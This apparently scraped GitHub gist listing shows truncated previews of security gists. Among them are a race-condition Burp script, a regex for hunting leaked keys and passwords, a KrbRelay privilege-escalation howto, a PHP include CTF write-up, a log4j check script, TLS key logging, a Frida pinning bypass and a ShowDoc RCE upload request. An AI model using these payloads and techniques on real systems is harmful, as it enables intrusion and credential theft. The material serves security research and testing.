Download VMware ISOs in this repo
All license keys and activation files have been removed in accordance with GitHub's Terms of Service.
Only official trial installers are available. Bring your own license (BYOL).
gabyavra
albinowax
/ race-condition-probe.java
Last active
May 16, 2025 13:59
Race condition custom action for Burp Repeater
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // This will use the single-packet attack for HTTP/2, and last-byte synchronisation for HTTP/1 | |
| int NUMBER_OF_REQUESTS = 10; | |
| var reqs = new ArrayList<HttpRequest>(); | |
| for (int i = 0; i < NUMBER_OF_REQUESTS; i++) { | |
| reqs.add(requestResponse.request()); | |
| } | |
| var responses = api().http().sendRequests(reqs); | |
| var codes = responses.stream().map(HttpRequestResponse::response).filter(Objects::nonNull).map(HttpResponse::statusCode).toList(); | |
| logging().logToOutput(codes); |
h4x0r-dz
/ Generic keys
Created
May 5, 2022 09:15
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
tothi
/ krbrelay_privesc_howto.md
Last active
April 23, 2025 01:59
Privilege Escalation using KrbRelay and RBCD
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.
Prerequisites:
- LDAP signing not required on Domain Controller (default!)
loknop
/ writeup.md
Created
December 30, 2021 14:59
Solving "includer's revenge" from hxp ctf 2021 without controlling any files
The challenge was to achieve RCE with this file:
<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).
I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.
byt3bl33d3r
/ log4j_rce_check.py
Created
December 10, 2021 06:02
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (https://www.lunasec.io/docs/blog/log4j-zero-day/)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python3 | |
| ''' | |
| Needs Requests (pip3 install requests) | |
| Author: Marcello Salvati, Twitter: @byt3bl33d3r | |
| License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License) | |
| This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021. |
felixhammerl
/ README.md
Last active
May 7, 2025 05:25
MitM TLS encrypted traffic in macOS using SSLKEYLOGFILE
mkdir -p ~/Library/LaunchAgents- Put
tlskeylogger.plistat~/Library/LaunchAgents/tlskeylogger.plist launchctl load ~/Library/LaunchAgents/tlskeylogger.plist, so it will load on the next restartlaunchctl start ~/Library/LaunchAgents/tlskeylogger.plist, so it will load the environment variable immediately- Restart your browser(s)
- See how TLS keys are being written to
~/.tlskeyfileviatail -f ~/.tlskeyfile
NB: This may be hit or miss and many apps do not respect the env var.
akabe1
/ frida_netsecconfig_bypass.js
Created
October 7, 2021 10:25
An Android network security config pinning bypass
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Android Network Security Config bypass script | |
| by Maurizio Siddu | |
| Run with: | |
| frida -U -f [APP_ID] -l frida_netsecconfig_bypass.js --no-pause | |
| */ | |
| Java.perform(function(){ | |
| console.log(''); | |
| console.log('======'); |
pikpikcu
/ showdoc-rce.md
Created
April 21, 2021 07:33
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Content-Length: 239
Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
Accept-Encoding: gzip
----------------------------835846770881083140190633
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
pikpikcu
/ ev-sites.txt
Created
March 24, 2021 06:38
— forked from ScottHelme/ev-sites.txt
Sites using EV in the Top 1 Million - 13th Sep 2019
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 14 apple.com | |
| 40 vk.com | |
| 44 github.com | |
| 49 tumblr.com | |
| 55 dropbox.com | |
| 85 medium.com | |
| 87 paypal.com | |
| 92 icloud.com | |
| 100 booking.com | |
| 112 weebly.com |
NewerOlder